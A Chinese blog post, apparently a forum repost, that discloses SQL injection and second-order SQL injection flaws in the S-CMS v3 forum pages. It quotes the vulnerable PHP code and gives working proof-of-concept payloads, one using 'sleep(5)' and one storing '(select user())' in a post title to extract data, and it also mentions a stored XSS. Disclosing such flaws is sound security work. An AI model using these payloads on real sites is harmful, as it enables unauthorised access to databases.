2. 程式人生 > >S-CMS企建v3二次SQL注入

S-CMS企建v3二次SQL注入

阿新 發佈:2018-12-10

0x00 前言

悄悄的說一句,頭一次挖到二次注入,我發現我膨脹了!雖然挺簡單的,但也是My第一次,第一次!!!!

首發T00ls

0x01 目錄

  • Sql注入
  • 二次SQL注入

0x02 Sql注入

漏洞檔案:\scms\bbs\bbs.php

$action=$_GET["action"];

$S_id=$_GET["S_id"];

if($action=="add"){

$B_title=htmlspecialchars($_POST["B_title"]);

$B_sort=$_POST["B_sort"];

$B_content=htmlspecialchars($_POST
 
["B_content"]);

$S_sh=getrs("select * from SL_bsort where S_id=".intval($B_sort),"S_sh");

if($S_sh==1){

$B_sh=0;

}else{

$B_sh=1;

}

$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort
 
.",".$B_sh.")");

mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('".$B_title."','".$B_content."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");

$sql="Select * from SL_bbs order by B_id desc limit 1";

$result = mysqli_query($conn
 
, $sql);

$row = mysqli_fetch_assoc($result);

    if (mysqli_num_rows($result) > 0) {

        $B_id=$row["B_id"];

    }

相對來說這個注入比較簡單,$B_sort 無過濾直接從POST獲取,然而在SELECT查詢的時候使用了intval函式來過濾變數。不過後面在insert的時候卻沒有任何過濾(無單引號包含)導致sql注入。

漏洞驗證:

Payload

  http://127.0.0.1/scms/bbs/bbs.php?action=add

  B_title=test&B_content=test11&B_sort=1 and sleep(5)

$debug除錯資訊:

Insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values('test','test11','2018-12-08 14:21:25',17,1 and sleep(5),0)

 

0x03 二次注入

漏洞檔案:

  \scms\bbs\bbs.php

  \scms\bbs\item.php

 

先看一下漏洞觸發點:

$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;

    $result = mysqli_query($conn, $sql);

$row = mysqli_fetch_assoc($result);

    if (mysqli_num_rows($result) > 0) {

    $B_title=lang($row["B_title"]);

    $B_content=lang($row["B_content"]);

    $B_time=$row["B_time"];

    $B_sort=$row["B_sort"];

    $S_title=lang($row["S_title"]);

    $B_view=$row["B_view"];

    $M_login=$row["M_login"];

    $M_pic=$row["M_pic"];

    $L_title=$row["L_title"];

    }

if(substr($M_pic,0,4)!="http"){

$M_pic="../media/".$M_pic;

}

$sql2="Select count(*) as B_count from SL_bbs where B_sub=".$id;

 

$result2 = mysqli_query($conn, $sql2);

$row2 = mysqli_fetch_assoc($result2);

$B_count=$row2["B_count"];

if($action=="reply"){

$B_contentx=$_POST["B_content"];

$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回覆]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");

mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回覆]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");

box("回覆成功!","item.php?id=".$id,"success");

}

簡單說一下邏輯,第一步執行的sql語句是查詢帖子的詳細內容($id帖子id

$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;

然後把查詢到的內容各自賦給一個變數

    $B_title=lang($row["B_title"]);

    $B_content=lang($row["B_content"]);

    $B_time=$row["B_time"];

    $B_sort=$row["B_sort"];

..............................

到後面判斷$action=="reply",進入回覆帖子功能處

if($action=="reply"){

$B_contentx=$_POST["B_content"];

$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回覆]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");

mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values('[回覆]".$B_title."','".$B_contentx."','".date('Y-m-d H:i:s')."',".$_SESSION["M_id"].",".$id.",".$B_sort.")");

box("回覆成功!","item.php?id=".$id,"success");

}

可以看到$B_contentx=$_POST["B_content"]無過濾,這裡會觸發儲存xss漏洞。然而這個不是重點,繼續看執行的insert語句,發現$B_title等變數都拼接了進來,沒有sql過濾,而這些變數是從資料庫查詢出來的(帖子的標題等),然而回過頭去看上面的sql注入,不就是發帖功能的地方麼。所以這些變數可控,導致二次sql注入。

 

漏洞觸發流程:

  首先我們去發帖B_title的值是我們的payload,還有其他的值

    B_title=',(select user()),'',1,999,1)%23&B_content=aaaaaaaaaaaa&B_sort=1

  然後我們去獲取帖子id,這個沒有特別好的辦法只能去摸索著找,可以先根據樓層判斷一共有多少帖子,然後一點一點的往後找,根據內容判斷是否是我們釋出的帖子

    http://127.0.0.1//scms/bbs/item.php?id=帖子id

  獲取到帖子後去觸發漏洞

    http://127.0.0.1//scms/bbs/item.php?action=reply&id=帖子id

    B_content=test

  這裡我說一下payload為什麼是這樣的,這樣構造完全是為了達到回顯注入,因為後面列印回覆內容的時候執行的sql注入是

    $sql="select * from SL_bbs where B_sub=".$id." order by B_id asc";

  而B_sub可控(在Insert的時候插入的),這樣我們就能直接獲取回顯。

漏洞演示:

  Payload1

    127.0.0.1/scms/bbs/bbs.php?action=add

    B_title=',(select user()),'',1,666,1)%23&B_content=hello_admin&B_sort=1

 

  Payload2

    獲取帖子id

    http://127.0.0.1//scms/bbs/item.php?id=30

 

 

  Payload3

    http://127.0.0.1//scms/bbs/item.php?action=reply&id=30

    B_content=test

 

執行完成!最後我們就可以去訪問我們的回覆然後拿到回顯。

http://127.0.0.1//scms/bbs/item.php?id=666

這次id引數指向的是我們填的B_sub

 

 

0x04 結束語

xxxxxxxxxxxxxxxxxx

相關推薦

S-CMSv3SQL注入

0x00 前言 悄悄的說一句,頭一次挖到二次注入,我發現我膨脹了!雖然挺簡單的,但也是My第一次,第一次!!!! 首發T00ls 0x01 目錄 Sql注入 二次SQL注入 0x02 Sql注入 漏洞檔案:\scms\bbs\bbs.php $action=$_GET["ac

S-CMSv3SQL註入

etc success alt soc 是我 mysqli 拼接 而在 演示 S-CMS企建v3二次SQL註入 0x01 前言 繼上一篇的S-CMS漏洞再來一波!首發T00ls 0x2 目錄 Sql註入二次SQL註入 0x03 Sql註入 漏洞文件:\scms\bbs\bb

第九屆極客大挑戰——小帥的廣告(sql注入

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。

張小白的滲透之路()——SQL注入漏洞原理詳解

SQL注入漏洞簡介 亂七八糟的就不多說了,自己百度去 SQL注入原理 想要更好的學習SQL注入,那麼我們就必須要深入的瞭解每種資料庫的SQL語法及特性。下面通過一個經典的萬能密碼的例子帶大家來撥開一下SQL注入漏洞的神祕面紗。本次環境為:DVWA的第一關(DVW

Java程式設計師從笨鳥到菜鳥之(一百零sql注入攻擊詳解(三)sql注入解決辦法

                在前面的部落格中,我們詳細介紹了:      我們瞭解了sql注入原理和sql注入過程,今天我們就來了解一下sql注入的解決辦法。怎麼來解決和防範sql注入,由於本人主要是搞java web開發的小程式設計師,所以這裡我只講一下有關於java web的防止辦法。其實對於其他的,

Java程式設計師從笨鳥到菜鳥之(一百零一)sql注入攻擊詳解(sql注入過程詳解

l 猜解資料庫中使用者名錶的名稱猜解法:此方法就是根據個人的經驗猜表名,一般來說,user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysu

sql注入攻擊詳解(sql注入過程詳解

l 猜解資料庫中使用者名錶的名稱 猜解法:此方法就是根據個人的經驗猜表名,一般來說,user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sys

SQL注入理解與體會

二階SQL注入理解與體會 一:SQL注入分類 SQL注入一般分為兩類:一階SQL注入(普通SQL注入),二階SQL注入 二:二者進行比較 0x01:一階SQL注入: 1;一階SQL注入發生在一個HTTP請求和響應中,對系統的攻擊是立即執行的; 2;攻擊者在http請求中提

記一sql注入實踐

今天開發程式碼的時候發現自己的sql全是拼接的,不是where a = ?的那種,細思恐極啊,於是進行了一場sql注入實踐。雖然失敗了,但是還是得出了一些寶貴的經驗。首先從一個基礎的分頁查詢語句開始分析:Select r.a,r.b  from role r where r.

AE開發中幾個功能速成歸納(符號設計器、創要素、圖形編輯、屬性表編輯、緩沖區分析)

文件夾路徑 及其 基本框架 option 開啟 rgs database ets remove /* * 實習課上講進階功能所用文檔,因為趕時間從網上抄抄改改,湊合能用,記錄一下以備個人後用。 * * --------------------------------

C# Inventor開發—002—啟動Inventor及零部件創和打開

pan clas manage cat nts tor AR .get -s 一、啟動Inventor   Inventor.Application對象是基於COM開發Inventor的出發點,以下是我封裝獲取Inventor Application方法: 1

vtkSuperquadricSource:創以原點為中心的多邊形超曲面

vtkSuperquadricSour VTK繪制超二次曲面  vtkSuperquadricSource 創建以原點為中心的多邊形超二次曲面,可以設置尺寸。 設置兩個(φ)的緯度和經度(θ)方向的分辨率(多邊形離散化)。渾圓度參數(緯度渾圓度和經度渾圓度)控制超二次曲面的形狀。環

Sql 註入詳解:寬字節註入+註入

.com 主動 一個 from 攻擊 過濾 分享圖片 size 就是 sql註入漏洞 原理:由於開發者在編寫操作數據庫代碼時,直接將外部可控參數拼接到sql 語句中,沒有經過任何過濾就直接放入到數據庫引擎中執行了。 攻擊方式: (1) 權限較大時,直接寫入webshell

C# SQl通過對檢視資料查詢,統計資料

    問題描述: 原資料---------需要在原檢視資料中,統計出每個Device_Num裝置號下面的交易的總額和分別統計出微信支付寶的交易總額。 解決:從上圖資料沒辦法使用直接查詢出要求的資料。          .1.首

C# SQl通過對視圖數據查詢,統計數據

支付 lse 要求 -- 解決 num 微信支付 otl 類型 問題描述: 原數據---------需要在原視圖數據中,統計出每個Device_Num設備號下面的交易的總額和分別統計出微信支付寶的交易總額。 解決:從上圖數據沒辦法使用直接查詢出要求的數據。

revit開發 內模型之放樣

/// <summary> /// 內建模型(放樣) /// </summary> private static void CreateSphereDirectShape(double MaxHeight, d

一些SAP Partners能夠通過開發實現打通C/4HANA和S/4HANA的方法介紹

有好幾位朋友在公眾號後臺給我留言詢問SAP C/4HANA和S/4HANA整合的方案。 儘管我給這些朋友推送了一個方案:打通C/4HANA和S/4HANA的一個原型開發:智慧服務創新案例,然而我得到的反饋是:在這個創新案例裡,需要在C/4HANA裡的服務雲做一些後臺開發,即下圖紅色方框標註

Sql 注入詳解:寬位元組注入+注入

sql注入漏洞 原理:由於開發者在編寫操作資料庫程式碼時,直接將外部可控引數拼接到sql 語句中,沒有經過任何過濾就直接放入到資料庫引擎中執行了。 攻擊方式: (1) 許可權較大時,直接寫入webshell 或者直接執行系統命令 (2) 許可權較小時,通過注入獲得管理

revit開發中怎樣nurbspline曲線形式的鋼筋

revit二次開發中nurbspline曲線的表現形式實際上是一系列的直線組成的。 由於revit只支援直線或者圓曲線的鋼筋變成鋼筋。所以不能將nurbspline曲線轉成鋼筋,所以可以先將nurbspline模型線轉連續的直線,然後再轉成鋼筋即可。 其中,nurbsp

藍的成長記——追逐DBA(20):何故緣起,庫護航 (釋出-練習使用markdown編輯)

原創作品,出自 “深藍的blog” 部落格,歡迎轉載,轉載時請務必註明出處,否則追究版權法律責任。 【前言】 自接觸oracle至今,愈是深入瞭解oracle愈是察覺到個人的渺小,時常感受到技術知識可以助推思維方式,一路走來,在汗水中收穫著成長的充實